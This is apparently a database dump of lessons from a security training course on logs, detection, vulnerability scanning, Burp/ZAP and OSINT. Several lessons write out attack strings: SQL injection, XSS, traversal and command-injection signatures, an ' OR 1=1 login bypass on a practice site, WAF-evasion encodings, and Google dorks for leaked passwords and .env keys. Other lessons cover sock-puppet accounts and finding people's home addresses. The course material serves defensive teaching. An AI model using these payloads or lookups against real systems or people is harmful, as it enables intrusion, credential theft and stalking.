(449, 50, '## Who am I?\n\nEnumerating the host you are on.\n\n### Commands\n1.  `hostname`: Computer Name.\n2.  `whoami`: Current user (`DOMAIN\\User`).\n    *   `whoami /priv`: Show my privileges (Look for *SeDebugPrivilege*).\n    *   `whoami /groups`: Show my groups (Look for *Administrators*).\n3.  `systeminfo`: Huge dump of OS version, Hotfixes (Patches), and Domain.\n    *   *Hack*: `systeminfo | findstr /B /C:\"OS Name\" /C:\"OS Version\"`', 'markdown', 5, '2025-12-26 21:05:12', '2025-12-29 14:01:57'),
(450, 51, '## Network Configuration\n\n### Ipconfig\n*   `ipconfig`: IP, Subnet Mask, Gateway.\n*   `ipconfig /all`: + MAC Address, DNS Servers, DHCP info.\n*   `ipconfig /release` & `ipconfig /renew`: Refresh DHCP.\n*   `ipconfig /flushdns`: Clear DNS cache.\n\n### Ping & Tracert\n*   `ping google.com`: Test connectivity. (Uses ICMP).\n*   `tracert google.com`: Trace the hops to the destination. (Shows which routers you pass through).\n\n### Netstat\nNetwork Statistics.\n*   `netstat -an`: Show all open ports and connections.\n*   `netstat -ano`: Show PIDs (So you can kill the process using the port).', 'markdown', 5, '2025-12-26 21:05:12', '2025-12-29 14:01:57'),
(451, 52, '## Tasklist & Taskkill\n\nManaging processes from CLI.\n\n### Tasklist\n*   `tasklist`: Lists all running processes and PIDs.\n*   `tasklist /svc`: Shows which **Service** creates the process. (Great for `svchost.exe`).\n*   `tasklist /m`: Lists DLLs used by each process.\n\n### Taskkill\n*   `taskkill /PID 1234`: Kill by ID.\n*   `taskkill /IM notepad.exe`: Kill by Image Name.\n*   `taskkill /F /IM notepad.exe`: **Force** kill. (Like `kill -9`).', 'markdown', 5, '2025-12-26 21:05:12', '2025-12-29 14:01:57'),
(460, 54, '## Anatomy of a Log: Reading the Matrix\n\nA log is just a text record of \"Software doing something\".\n\n### The 3 Pillars of Observability\n1.  **Logs**: Discrete events (The error happened at 2:01 PM).\n2.  **Metrics**: Aggregated numbers (CPU usage was 80%).\n3.  **Traces**: The journey of a request across services.\n\n### Common Log Formats\n*   **Syslog (The Standard)**: `Dec 29 10:00:00 hostname sshd[1234]: Failed password for root from 1.2.3.4`.\n*   **JSON (The Modern)**: `{\"timestamp\": \"2025-12-29T10:00:00\", \"host\": \"web01\", \"level\": \"ERROR\"}`.\n*   **CEF (Common Event Format)**: Used by ArcSight. `CEF:0|Vendor|Product|Version|ID|Name|Sev|Extension`.\n\n### Why Analysts Hate Unstructured Logs\nIf a developer logs: `Error: Something bad happened.`\n*   It tells you **nothing**.\n*   A good log answers: **Who? What? Where? When?**\n\n### The Timestamp Problem\n*   **Timezones**: Is the log in UTC or EST? If you correlate a UTC firewall log with an EST server log, you will be 5 hours off, and you will miss the attack.\n*   **Rule**: Always set servers to UTC.', 'markdown', 10, '2025-12-26 21:12:59', '2025-12-29 16:31:02'),
(461, 55, '## SSH Authentication Logs\n\nThe most attacked service on the internet.\n\n### /var/log/auth.log (or secure)\nIf you open a Linux server to the internet on Port 22, you will see this 5 seconds later:\n\n*   **Failed Password**:\n    `Invalid user admin from 192.168.1.5`\n    `Failed password for invalid user admin from 192.168.1.5 port 22 ssh2`\n    *   This is a Dictionary Attack (Brute Force).\n\n*   **Successful Login**:\n    `Accepted password for root from 192.168.1.5 port 22 ssh2`\n    `pam_unix(sshd:session): session opened for user root`\n    *   **Alert**: If you see this from a strange IP -> **Immediate Incident**.\n\n### Public Key Auth (The Secure Way)\n`Accepted publickey for root from 1.2.3.4...`\n*   This means they used an SSH Key file (`id_rsa`), not a password.\n*   It is much harder to brute force.', 'markdown', 10, '2025-12-26 21:12:59', '2025-12-29 16:31:03'),
(462, 56, '## Web Access Logs (Apache/Nginx)\n\nFormat: `IP - User - Date - \"Request\" - Status - Bytes - Referrer - UserAgent`\n\n### Status Codes\n*   **200 OK**: Request succeeded. (The page loaded).\n*   **301/302 Redirection**: Moved.\n*   **404 Not Found**: Client requested junk.\n    *   *Security Note*: High volume of 404s suggests a **Fuzzing/Dirbusting** attack (Looking for hidden files).\n*   **403 Forbidden**: Access Denied.\n*   **500 Internal Server Error**: The server crashed.\n    *   *Security Note*: A 500 often means an Exploit (SQLi or RCE) broke the application logic. Investigate 500s!', 'markdown', 10, '2025-12-26 21:12:59', '2025-12-29 14:05:38'),
(463, 57, '## Windows Logs (Security)\n\nFocus on **Event ID 4624 (Logon Success)** and **4625 (Failure)**.\n\n### Logon Types\nThe key field in Event 4624.\n*   **Type 2**: Interactive. (Someone sat at the keyboard).\n*   **Type 3**: Network. (Someone accessed a Shared Folder or mapped a drive).\n    *   *Note*: Psexec uses Type 3.\n*   **Type 10**: RemoteDesktop. (RDP).\n    *   *Note*: The source IP is logged here. Crucial for tracking RDP attacks.', 'markdown', 10, '2025-12-26 21:12:59', '2025-12-29 14:05:38'),
(464, 58, '## Detecting Web Attacks via Logs\n\n### SQL Injection (SQLi)\nLook for SQL syntax in the URL/URI.\n*   `UNION SELECT`\n*   `OR 1=1`\n*   `%27` (Single Quote encoded).\n\n### Cross Site Scripting (XSS)\nLook for HTML/JS tags.\n*   `<script>`\n*   `alert(1)`\n*   `%3Cscript%3E`\n\n### Directory Traversal\nTrying to escape the web root.\n*   `../../../../etc/passwd`\n*   `..%2F..%2F` (Encoded).', 'markdown', 10, '2025-12-26 21:12:59', '2025-12-29 14:05:38'),
(465, 59, '## Firewall Logs\n\nUsually very simple but high volume.\n*   `ALLOW TCP 192.168.1.5:54332 -> 8.8.8.8:53`\n*   `DENY TCP 1.2.3.4:445 -> 192.168.1.1:445`\n\n### Indicators\n1.  **Outbound DENY**: Internal host trying to reach a blocked service (e.g., Malware trying to connect to C2 on port 6667 IRC).\n2.  **Internal Scanning**: One internal IP connecting to 445 on ALL other IPs. (Lateral Movement / Worm).\n3.  **Beaconing**: Regular connections to the same external IP every 60 seconds. (C2 Heartbeat).', 'markdown', 10, '2025-12-26 21:12:59', '2025-12-29 14:05:38'),
(466, 60, '## Detecting Command Injection\n\nWhen input meant for a form is passed to a System Shell.\n\n### Signatures\n*   `; cat /etc/passwd` (The semicolon chains commands).\n*   `| whoami`\n*   `$(reboot)`\n*   `&& ping 1.1.1.1`\n\n### Review\nIf you see these characters `; | $ &` in a Username or Search field in your logs, you are being attacked.', 'markdown', 10, '2025-12-26 21:12:59', '2025-12-29 14:05:38'),
(467, 61, '## Advanced Obfuscation\n\nAttackers hide their payloads to bypass WAFs (Web Application Firewalls).\n\n### Techniques\n1.  **URL Encoding**: `select` -> `%73%65%6C%65%63%74`.\n2.  **Double URL Encoding**: `%252E` (Encodes the % sign).\n3.  **Case Variation**: `SeLeCt * FrOm`.\n4.  **Whitespace**: `SELECT/**/Password/**/FROM` (SQL ignores comments, WAF might get confused).\n\n### De-obfuscation\nThe Analyst\'s job is to decode the string back to plaintext to understand the intent via tools like CyberChef.', 'markdown', 10, '2025-12-26 21:12:59', '2025-12-29 14:05:38'),
(468, 72, '## Web Proxies\n\nA Proxy sits between You (Client) and the Internet (Server).\n*   **Forward Proxy**: Protects the Client. (e.g., Corporate specific proxy filtering Facebook).\n*   **Reverse Proxy**: Protects the Server. (e.g., Cloudflare sits in front of a website to stop DDOS).\n\n### The Attacker\'s Proxy (Intercepting Proxy)\nTools like **Burp Suite** or **OWASP ZAP**.\nThey allow you to \"freeze\" time.\n1.  You click \"Login\" on a website.\n2.  The browser sends the POST request.\n3.  The Proxy CATCHES it before it goes to the server.\n4.  You edit the request (change `price=100` to `price=0`).\n5.  You forward it.\n6.  The server processes the modified request.', 'markdown', 5, '2025-12-26 21:17:42', '2025-12-29 14:05:38'),
(469, 73, '## Burp Suite\n\nThe de-facto standard for Web App Hacking.\n\n### Key Components\n1.  **Dashboard**: Status checks.\n2.  **Proxy**: The Interceptor.\n    *   **Intercept is On**: Traffic stops until you click Forward.\n    *   **HTTP History**: A log of every request sent.\n3.  **Repeater**: Manual Testing. (Send -> Modify -> Resend).\n4.  **Intruder**: Brute forcing. (Send -> fuzz payload -> Resend 1000 times).\n5.  **Decoder**: Base64/URL encoding tool.\n\n### Setup\nBurp listens on `127.0.0.1:8080`.\nYou must configure your browser (Firefox) to send traffic there, or use Burp\'s built-in Chromium browser.', 'markdown', 5, '2025-12-26 21:17:42', '2025-12-29 14:05:38'),
(470, 74, '## Hands On: Intercepting\n\n### Step-by-Step\n1.  Open Burp. Go to Proxy -> Intercept. Turn it **ON**.\n2.  Open Browser. Go to `http://testphp.vulnweb.com/login.php`.\n3.  Type `admin` / `admin` and hit Enter.\n4.  Browser hangs (it is waiting).\n5.  Look at Burp. You see the raw HTTP request:\n    ```http\n    POST /userinfo.php HTTP/1.1\n    Host: testphp.vulnweb.com\n    uname=admin&pass=admin\n    ```\n6.  Change `uname=admin` to `uname=\' OR 1=1 --`.\n7.  Click **Forward**.\n8.  Check Browser. You are logged in! (SQL Injection).', 'markdown', 5, '2025-12-26 21:17:42', '2025-12-29 14:05:38'),
(471, 75, '## The Repeater\n\nThe most used tab in Burp.\nInstead of going back to the browser, re-typing the password, and hitting submit... just send the request to **Repeater**.\n\n### Workflow\n1.  Right click a request in Proxy History -> **Send to Repeater** (Ctrl+R).\n2.  Go to Repeater Tab.\n3.  Change one character.\n4.  Click **Send**.\n5.  Look at the Response on the right.\n6.  Repeat.\n\n### Decoder\nHackers use encoding to bypass filters.\n*   **Base64**: `admin` -> `YWRtaW4=`.\n*   **URL**: `SELECT *` -> `SELECT%20%2A`.\n*   Decoder helps you decode cookie values to see if they are readable.', 'markdown', 5, '2025-12-26 21:17:42', '2025-12-29 14:05:38'),
(472, 76, '## Proxy Chaining (Anonymity)\n\nSometimes you need to hide where you are coming from.\n\n### TOR (The Onion Router)\n*   Routes traffic through 3 nodes (Entry -> Middle -> Exit).\n*   **Proxychains**: A Linux tool that forces *any* program to go through TOR.\n    *   `proxychains nmap -sT target.com`\n    *   Output: `DNS-request ... S-chain ... OK`\n\n### VPN vs Proxy\n*   **VPN**: Encrypts ALL traffic from your PC (OS level).\n*   **Proxy**: Encrypts/Routes traffic only for that specific App (Browser level).', 'markdown', 5, '2025-12-26 21:17:42', '2025-12-29 14:05:38'),
(517, 77, '## IDS vs IPS: Architecture & Strategy\n\n**IDS (Intrusion Detection System)**: The Security Camera. It watches and alerts (Passive).\n**IPS (Intrusion Prevention System)**: The Bouncer. It watches and BLOCKS (Active).\n\n### Architecture Deployment\n*   **Out-of-Band (IDS)**:\n    *   Connected via a TAP or SPAN Port (Mirror).\n    *   It sees a *copy* of the traffic.\n    *   *Pro*: If the IDS crashes, network traffic continues (Fail-Open).\n    *   *Con*: It cannot stop a single packet, it can only send a \"Reset\" (TCP RST) packet to try and kill the connection, which often fails against fast attacks.\n*   **In-Line (IPS)**:\n    *   Sits directly in the wire (Cable A -> IPS -> Cable B).\n    *   *Pro*: Can drop packets instantly, so a matched attack never reaches the target.\n    *   *Con*: If the IPS crashes or gets overloaded, the internet goes down for the whole company (Fail-Closed).\n\n### Which one to use?\n*   **Core**: Usually IDS. You don\'t want to risk blocking the CEO\'s email.\n*   **Edge**: IPS (Firewall). Block known bad stuff aggressively.', 'markdown', 15, '2025-12-26 22:11:01', '2025-12-29 16:31:52'),
(518, 78, '## Detection Methodologies\n\nHow does the box know it\'s an attack?\n\n### 1. Signature-Based (The Anti-Virus Model)\n*   **Concept**: Pattern Matching.\n*   **Example**: \"If packet contains `0x909090` (NOP Sled) AND `cmd.exe` -> ALERT.\"\n*   **Pros**: Fast, Low False Positives.\n*   **Cons**: Blind to Zero-Days. If the attacker changes 1 byte of the payload, the signature fails. (e.g., `cmD.eXe`).\n\n### 2. Anomaly-Based (Behavioral)\n*   **Concept**: \"This looks weird.\"\n*   **Baseline**: The system learns \"Normal\". (e.g., \"Web Server usually speaks HTTP on port 80\").\n*   **Alert**: \"Web Server is speaking IRC on port 6667.\" -> ALERT.\n*   **Pros**: Catches Zero-Days.\n*   **Cons**: High False Positives. (Did the backup job start at a weird time? ALERT).\n\n### 3. Protocol Analysis (Stateful)\n*   **Concept**: Rules of the Road.\n*   **Example**: \"In TCP, after SYN, next must be SYN-ACK.\"\n*   **Alert**: \"Client sent ACK without SYN.\" -> ALERT (Malformed Packet / Scan).', 'markdown', 15, '2025-12-26 22:11:01', '2025-12-29 16:31:53'),
(519, 79, '## Network (NIDS) vs Host (HIDS)\n\nYou need both.\n\n### NIDS (Suricata, Snort, Zeek)\n*   **View**: The Network Wire.\n*   **Blindspot**: **Encryption (TLS/SSL)**.\n    *   If the attacker uses HTTPS, the NIDS sees garbage ciphertext. It cannot detect the SQL Injection inside the SSL tunnel (unless you use SSL Termination).\n\n### HIDS (Wazuh, OSSEC, CrowdStrike)\n*   **View**: The Endpoint (OS).\n*   **Advantage**: It sees the data *after* decryption.\n*   **Advantage 2**: It sees local files and logs.\n*   **Example**: NIDS sees encrypted traffic. HIDS sees `cmd.exe` being spawned by IIS. HIDS wins here.\n\n### Deployment Strategy\n1.  **NIDS** at the gateway to filter massive noise.\n2.  **HIDS** on every server to catch what slips through.', 'markdown', 15, '2025-12-26 22:11:01', '2025-12-29 16:31:53'),
(520, 81, '## Zeek (Bro) Surveillance\n\n**Zeek** is not a traditional IDS. It is a \"Network Flight Recorder\".\nIt doesn\'t just look for attacks; it logs **everything** in structured metadata.\n\n### The Power of Zeek\nInstead of a binary \"Match/No Match\", Zeek creates logs:\n*   `conn.log`: Every single TCP/UDP connection. (Duration, Bytes, Service).\n*   `http.log`: Every URL, User-Agent, Referrer.\n*   `dns.log`: Every DNS query.\n*   `ssl.log`: Every Certificate seen.\n\n### Forensics Use Case\n*   **Alert**: \"Malware detected on PC-5.\"\n*   **Question**: \"Has PC-5 talked to this C2 server before today?\"\n*   **Snort**: \"I don\'t know, there was no signature.\"\n*   **Zeek**: \"Yes. Checking `dns.log`... PC-5 queried `evil.com` 4 days ago. Checking `conn.log`... data was transferred.\"\n\n### Threat Hunting\n\"Show me all SSL Certificates where the Issuer is \'Let\'s Encrypt\' but the domain is a Bank.\" (Phishing).', 'markdown', 15, '2025-12-26 22:11:01', '2025-12-29 16:31:53'),
(521, 82, '## Alert Triage & Investigation\n\nThe core loop of the SOC Analyst.\n\n### 1. Validation (True or False?)\n*   **Alert**: \"SQL Injection Detected from 1.2.3.4\".\n*   **Check**: Look at the HTTP Response Code.\n    *   if **200 OK**: The server accepted it. **True Positive**. (BAD).\n    *   if **500 Error**: The server crashed. **True Positive**. (BAD).\n    *   if **403 Forbidden**: The WAF blocked it. **True Positive (Blocked)**. (Good).\n    *   if **404 Not Found**: Scanner. **True Positive (Attempt)**.\n\n### 2. Context\n*   **Source IP**: Is it internal or external? Is it a known scanner (Shodan)?\n*   **Dest IP**: Is it a Critical Server or a Test Box?\n\n### 3. Investigation\n*   Checking other logs. \"Did the endpoint spawn a shell right after this?\"\n\n### 4. Categorization\n*   **True Positive**: Real Attack.\n*   **False Positive**: Normal traffic flagged as bad. (e.g., Admin running a backup script looks like data exfil).\n*   **False Negative**: Attack happened, but NO alert fired. (The worst case).', 'markdown', 15, '2025-12-26 22:11:01', '2025-12-29 16:31:53'),
(522, 83, '## Handling False Positives\n\nTuning is the job of the Security Engineer.\n\n### Common Causes\n1.  **Vulnerability Scanners**: Nessus scans look like attacks. Whitelist the scanner IP.\n2.  **Poorly written rules**: A rule checking for \"files containing 00\" triggers on binary downloads.\n3.  **Updates/Software**: A new legit app behaves weirdly.\n\n### Tuning\n*   **Disable**: Turn off the rule entirely (Risky).\n*   **Suppress**: \"Don\'t alert on this rule for Source IP 1.2.3.4\". (Better).\n*   **Rewrite**: Make the rule more specific.', 'markdown', 15, '2025-12-26 22:11:01', '2025-12-29 14:05:38'),
(523, 84, '## The Vulnerability Lifecycle\n\nVulnerability Management (VM) is not just \"Scanning\". It is a process.\n\n### 1. Discovery\n*   Asset Inventory. You can\'t scan what you don\'t know exists.\n*   \"We found a rogue Raspberry Pi on the network.\"\n\n### 2. Prioritization\n*   Scanner says: \"Critical Bug on Server A (Test) and Server B (Production)\".\n*   **Context**: Server B exposes patient data. Server A is empty. Fix B first.\n\n### 3. Remediation\n*   **Patch**: Install the update.\n*   **Mitigate**: Cannot patch (Legacy App)? Add a Firewall rule (Virtual Patch).\n*   **Accept**: \"The risk is low, fixing it costs $1M. We accept the risk.\" (Must be signed by Exec).\n\n### 4. Verification\n*   Re-scan. \"Did the patch actually work?\"\n\n### The Time Gap\n**Window of Exposure**: The time between the bug discovery (Day 0) and the Patch applied (Day 30).\nYour goal is to shrink this window.', 'markdown', 15, '2025-12-26 22:11:01', '2025-12-29 16:31:53'),
(524, 85, '## Authenticated vs Unauthenticated Scanning\n\n### Unauthenticated Scan (The Hacker\'s View)\n*   The scanner sends packets to ports (80, 443).\n*   It grabs banners: \"Apache 2.4.49\".\n*   It checks the Banner version against a CVE list.\n*   *Problem*: It misses everything inside the OS. Browsers, Adobe Reader, Kernel versions.\n*   *Result*: High False Positives (Backported patches look old).\n\n### Authenticated Scan (The Auditor\'s View)\n*   You give the scanner credentials (a dedicated SSH user, or a Windows Admin account).\n    *   Treat these credentials as privileged: use a dedicated, least-privilege account and rotate it, because a compromised scanner can log in everywhere.\n*   The scanner logs in.\n*   It runs `rpm -qa` or looks at the Registry.\n*   \"I see Chrome version 80 installed.\"\n*   *Result*: Extremely accurate. This is the Gold Standard for corporate VM.', 'markdown', 15, '2025-12-26 22:11:01', '2025-12-29 16:31:53'),
(525, 86, '## Decoding CVSS Scores\n\n**Common Vulnerability Scoring System (CVSS)** looks objective, but requires interpretation.\n\n### The Metrics (CVSS v3.1)\n*   **AV (Attack Vector)**: Network (N), Adjacent (A), Local (L), Physical (P).\n    *   *Network* is worst (Remote).\n*   **AC (Attack Complexity)**: Low (L) vs High (H).\n    *   *Low* means a script kiddie can do it.\n*   **PR (Privileges Required)**: None (N), Low (L), High (H).\n    *   *None* is worst (Unauth RCE).\n*   **UI (User Interaction)**: None (N) vs Required (R).\n    *   *Required* means user must click a link (Phishing).\n*   **S (Scope)**: Unchanged (U) vs Changed (C).\n    *   *Changed* means breaking out of the sandbox (VM Escape).\n*   **CIA**: Confidentiality, Integrity, Availability.\n\n### Example: Log4J\n**CVSS: 10.0** (Critical)\n`AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H`\n*   Network Access.\n*   Low Complexity.\n*   No Privs.\n*   No User Click.\n*   Total compromise.\n*   **This is why it set the internet on fire.**', 'markdown', 15, '2025-12-26 22:11:01', '2025-12-29 16:31:53'),
(526, 87, '## Nessus Essentials\n\nThe world\'s most popular scanner.\n\n### Setup\n1.  Download Nessus Essentials (Free for 16 IPs).\n2.  Install (Web Interface on port 8834).\n3.  New Scan -> \"Basic Network Scan\".\n4.  Target: `192.168.1.0/24`.\n\n### Plugins\nNessus uses plugins (scripts written in NASL) to check for specific bugs.\n*   plugin #11011 (SMB Signing).\n*   plugin #33850 (Unsupported Unix OS).\nThere are 180,000+ plugins.', 'markdown', 15, '2025-12-26 22:11:01', '2025-12-29 14:06:41'),
(527, 88, '## Analyzing Scan Reports\n\nScanners (Nessus, Qualys) generate 500-page PDF reports. Nobody reads them.\nYour job is to filter.\n\n### False Positives\n*   **Backporting**: Linux distros (RedHat) fix bugs but keep the version number the same.\n    *   Scanner sees \"Apache 2.4.6\". Says \"Vulnerable to CVE-2019...\".\n    *   Reality: It is `Apache 2.4.6-97.el7`. The fix is applied.\n    *   *Action*: Verify using the package manager (`yum info httpd`).\n\n### Supersedence\n*   Patch A fixes Bug 1.\n*   Patch B fixes Bug 1 and Bug 2.\n*   Report: Lists both.\n*   *Action*: Just install Patch B.\n\n### Focus on Exploitable\n*   A \"Critical\" bug with **No Exploit Available** is less dangerous than a \"High\" bug with a **Metasploit Module** available right now.\n*   Use Threat Intel to tag \"Exploited in the Wild\".', 'markdown', 15, '2025-12-26 22:11:01', '2025-12-29 16:31:53'),
(528, 89, '## Patch Management\n\nThe most effective security control.\n\n### The Patch Tuesday Cycle\nMicrosoft releases patches on the 2nd Tuesday of every month.\n1.  **Tuesday**: Patches released.\n2.  **Wednesday**: Testing in \"Dev\" environment. (Does the patch break the App?).\n3.  **Thursday**: Deploy to \"Pilot\" group (10% of users).\n4.  **Friday**: Deploy to everyone.\n\n### Legacy Systems\nWhat if you CAN\'T patch? (e.g., MRI machine running Windows XP).\n**Mitigating Controls**:\n*   **Air Gap**: Disconnect from internet.\n*   **VLAN**: Segregate it so it can only talk to the Printer.\n*   **IPS**: Virtual Patching (Block the exploit at the network level).', 'markdown', 15, '2025-12-26 22:11:01', '2025-12-29 14:06:41'),
(529, 90, '## CVE (Common Vulnerabilities and Exposures)\n\nThe Dictionary. Managed by MITRE.\n\n### Format: CVE-YEAR-NUMBER\n*   `CVE-2017-0144` (EternalBlue).\n*   **Year**: When it was assigned (not necessarily disclosed).\n*   **Number**: Unique ID.\n\n### NVD (National Vulnerability Database)\nThe US Government database that adds context (CVSS score) to the CVE.\n*   Process: Researcher finds bug -> Requests CVE -> MITRE assigns ID -> Researcher publishes details -> NVD scores it.', 'markdown', 15, '2025-12-26 22:11:01', '2025-12-29 14:06:41'),
(530, 91, '## Risk Response Strategies\n\nYou found a Critical Vuln. What now?\n\n1.  **Mitigate (Remediate)**: Fix it. (Apply Patch). Preferred.\n2.  **Accept**: \"We know it is risky, but we need Windows XP for this old robot arm. We accept the risk.\" (Must be signed by Exec).\n3.  **Transfer**: Buy Insurance. \"If we get hacked, Insurance pays.\"\n4.  **Avoid**: Turn off the functionality. \"Disable SMBv1\".', 'markdown', 15, '2025-12-26 22:11:01', '2025-12-29 14:06:41'),
(531, 92, '## DAST (Dynamic Application Security Testing)\n\nTesting the running application from the outside (Black Box).\n*   **Tool**: OWASP ZAP, Burp Suite Pro, Acunetix.\n*   **Method**: Fuzzing. Throwing garbage at the app to see if it breaks.\n\n### SAST vs DAST\n*   **SAST (Static)**: Scans the Source Code (White Box). \"You have a variable that isn\'t sanitized on line 40.\"\n*   **DAST (Dynamic)**: Scans the URL. \"I sent \' OR 1=1 and got a database error.\"', 'markdown', 15, '2025-12-26 22:11:01', '2025-12-29 14:06:41'),
(532, 93, '## OWASP Top 10\n\nThe Ten Commandments of Web Security. Updated every few years (2021 is current).\n\n1.  **Broken Access Control**: User A can see User B\'s data.\n2.  **Cryptographic Failures**: Storing passwords in cleartext.\n3.  **Injection**: SQLi, Command Injection.\n4.  **Insecure Design**: Logic flaws.\n5.  **Security Misconfiguration**: Default passwords, Verbose error messages.\n6.  **Vulnerable Components**: Using an old jQuery library with known bugs.\n...\n(Memorize the top 3 at least!)', 'markdown', 15, '2025-12-26 22:11:01', '2025-12-29 14:06:41'),
(533, 94, '## OWASP ZAP (Zed Attack Proxy)\n\nThe \"Free Burp Suite\". Open Source.\n\n### Quick Start\n1.  **Automated Scan**: Type URL, click Attack.\n    *   Spider crawls the site.\n    *   Active Scanner attacks inputs.\n2.  **HUD**: ZAP injects a toolbar into your browser so you can hack while you surf.\n\n### Use Case\nGreat for CI/CD pipelines. You can automate ZAP to scan your website every night.', 'markdown', 15, '2025-12-26 22:11:01', '2025-12-29 14:06:41'),
(534, 95, '## Spidering (Crawling)\n\nMapping the Application.\nThe scanner follows every link (`<a href=...>`) to find all pages.\n\n### Challenges\n1.  **Login Forms**: The spider hits the login page and stops. You must configure Auth.\n2.  **Infinite Loops**: Calibration calendar (Next Month -> Next Month -> ...). The spider gets stuck forever.\n3.  **Destructive Actions**: If the spider clicks \"Delete Account\", it deletes the account.\n    *   **Pro Tip**: Never scan Production with a privileged account unless you have backups.', 'markdown', 15, '2025-12-26 22:11:01', '2025-12-29 14:06:41'),
(535, 96, '## Active Scanning Mechanics\n\nHow does the bot hack?\nIt uses **Payload Lists**.\n\n### Example: SQL Injection Check\n1.  Finds input `id=5`.\n2.  Sends `id=5\'`. Checks for \"Syntax Error\".\n3.  Sends `id=5 AND 1=1`. Checks if page loads.\n4.  Sends `id=5 AND 1=2`. Checks if page disappears.\nIf 3 works and 4 fails -> **Vulnerable**.\n\nThis creates thousands of requests. Do not run this on fragile legacy servers.', 'markdown', 15, '2025-12-26 22:11:01', '2025-12-29 14:06:41'),
(536, 97, '## DAST False Positives\n\nDAST is noisy.\n*   **The \"Error Page\" Fallacy**: The scanner sees the word \"SQL\" on a page (e.g., in a blog post about SQL) and thinks it caused an error.\n*   **Timeout**: The scanner slowed down the server, causing 500 errors, which it interprets as vulnerabilities.\n\n**Verification**: always reproduce the finding manually with Burp Repeater.', 'markdown', 15, '2025-12-26 22:11:01', '2025-12-29 14:06:41'),
(537, 98, '## Writing the Report\n\nDevelopers hate generic reports.\n\"Fix Cross Site Scripting\" - HOW? WHERE?\n\n### The Perfect Bug Report\n1.  **Title**: Reflected XSS on Search Page.\n2.  **Location**: `GET /search.php?q=PAYLOAD`\n3.  **Evidence**: Screenshot of the `alert(1)` box.\n4.  **Impact**: \"Attacker can steal session cookies.\"\n5.  **Fix**: \"Sanitize input using the `htmlspecialchars()` function in PHP (i.e., HTML-encode the value where it is echoed back into the page).\"', 'markdown', 15, '2025-12-26 22:11:01', '2025-12-29 14:06:41'),
(538, 160, '# Module 16 Final Quiz\n\nThis final test evaluates your understanding of the **Vulnerability Management** module.\n\n## Instructions\n*   This quiz contains **20 Questions**.\n*   It covers all topics: Lifecycle, Authentication, CVSS, Nessus, Reporting, Patching, CVEs, and Risk.\n*   There is no time limit, but try to answer without looking up the answers.\n\n## Key Concepts Reviewed\n*   **Lifecycle**: Discovery -> Assessment -> Prioritization -> Remediation -> Verification.\n*   **CVSS**: Base metrics (AV, AC, PR, UI, S, C, I, A).\n*   **Scans**: Auth vs Unauth, Internal vs External.\n*   **Reports**: Filter by Severity and Exploitability.\n*   **Remediation**: Patches, Workarounds, and Risk Acceptance.\n\nGood Luck!', 'markdown', 15, '2025-12-26 22:11:01', '2025-12-26 22:11:01'),
(539, 181, '## What is OSINT?\n\n**Open Source Intelligence** is the art of finding information that is publicly available but hidden in plain sight.\n\n### The Scope\n*   **Public**: It must be accessible without hacking.\n*   **Legal**: You are not breaking into servers. You are reading what they posted.\n\n### Passive vs Active\n*   **Passive Recon**: You never touch the target\'s servers.\n    *   Looking at Archive.org, LinkedIn, Whois.\n    *   *Risk*: Zero. The target doesn\'t know you exist.\n*   **Active Recon**: You touch the target.\n    *   Port Scanning (Nmap), Banner Grabbing.\n    *   *Risk*: High. The firewall logs your IP.\n\n### The \"Grey Man\" Concept\nAn OSINT analyst must be invisible.\n*   Do not like posts on LinkedIn with your real account.\n*   Do not visit the target website from your corporate VPN.\n*   Use a \"Sock Puppet\" (Fake Persona).', 'markdown', 15, '2025-12-26 22:15:15', '2025-12-29 16:32:38'),
(540, 182, '## The Intelligence Cycle\n\nHow to turn \"Data\" into \"Intelligence\".\n\n1.  **Planning (Requirements)**: \"Does this company have a presence in China?\"\n2.  **Collection**: Running tools.\n    *   \"Found 500 IPs.\"\n    *   \"Found 50 employees on LinkedIn.\"\n    *   This is just noise (Raw Data).\n3.  **Processing**: Filtering.\n    *   \"Remove the 400 IPs that are Cloudflare.\" (Useless).\n    *   \"Translate the Chinese profiles to English.\"\n4.  **Analysis**: The \"So What?\".\n    *   \"Employee X posted a photo of the server room password on Instagram.\"\n    *   *Conclusion*: They have weak physical security policies.\n5.  **Dissemination**: The Report.\n    *   \"To: CISO. From: Intel Team. Subject: Credential Leak.\"\n6.  **Feedback**: \"Was this helpful?\"', 'markdown', 15, '2025-12-26 22:15:15', '2025-12-29 16:32:38'),
(541, 183, '## OPSEC & Sock Puppets\n\n**Operational Security (OPSEC)** is protecting *yourself* while you hunt.\n\n### The Sock Puppet (Fake Account)\n*   **Name**: Create a fake name (Use a generator).\n*   **Photo**: Do NOT use ThisPersonDoesNotExist.com (AI artifacts are easy to spot). Use a generic photo (e.g., a car, a landscape) or a heavily modified real photo.\n*   **History**: An account created today with 0 friends is suspicious.\n    *   \"Age\" the account. Post random stuff for a month before using it.\n    *   Add random people (Recruiters accepted everyone).\n\n### Technical OPSEC\n*   **Browser**: Use a separate browser profile.\n*   **VPN**: Always on. Use a commercial VPN (Proton, Mullvad).\n*   **VM**: Use a disposable Virtual Machine. If you download malware by accident, just delete the VM.\n*   **Burner Phones**: For 2FA verification (Google Voice, textverified.com).', 'markdown', 15, '2025-12-26 22:15:15', '2025-12-29 16:32:38'),
(542, 184, '## Google Dorking Mastery\n\nGoogle is a hacking tool.\n\n### Operators\n*   `site:` Search only this domain. (`site:target.com`)\n*   `filetype:` Search file extensions. (`filetype:pdf`)\n*   `inurl:` Search the URL bar. (`inurl:admin`)\n*   `intitle:` Search the page title. (`intitle:\"index of\"`)\n\n### The \"Juicy\" Dorks\n1.  **Finding Passwords**:\n    `site:pastebin.com \"password\" \"target.com\"`\n2.  **Finding Config Files**:\n    `site:target.com filetype:env` (Looking for .env files with AWS keys).\n3.  **Finding Admin Panels**:\n    `site:target.com inurl:login`\n4.  **Finding Directory Listings**:\n    `intitle:\"index of\" \"backup\"`\n\n### Google Hacking Database (GHDB)\nA repository of thousands of pre-made dorks maintained by Exploit-DB.', 'markdown', 15, '2025-12-26 22:15:16', '2025-12-29 16:32:38'),
(543, 185, '## People Reconnaissance\n\nFinding a person.\n\n### The Username correlation\nMost people use the same username everywhere.\n*   `namechk.com`: Check if `supercoder99` is taken on Instagram, Github, TikTok.\n*   If they use the same avatar on multiple sites, that is a strong confirmation.\n\n### Real Estate & Voter Records\nIn the US, voter records and property deeds are public.\n*   Sites like `TruePeopleSearch` or `FamilyTreeNow` aggregate this.\n*   You can find Home Addresses, Phone Numbers, and Relatives for free.\n*   **Defensive Note**: You should opt-out of these sites to protect yourself.', 'markdown', 15, '2025-12-26 22:15:16', '2025-12-29 14:04:25'),
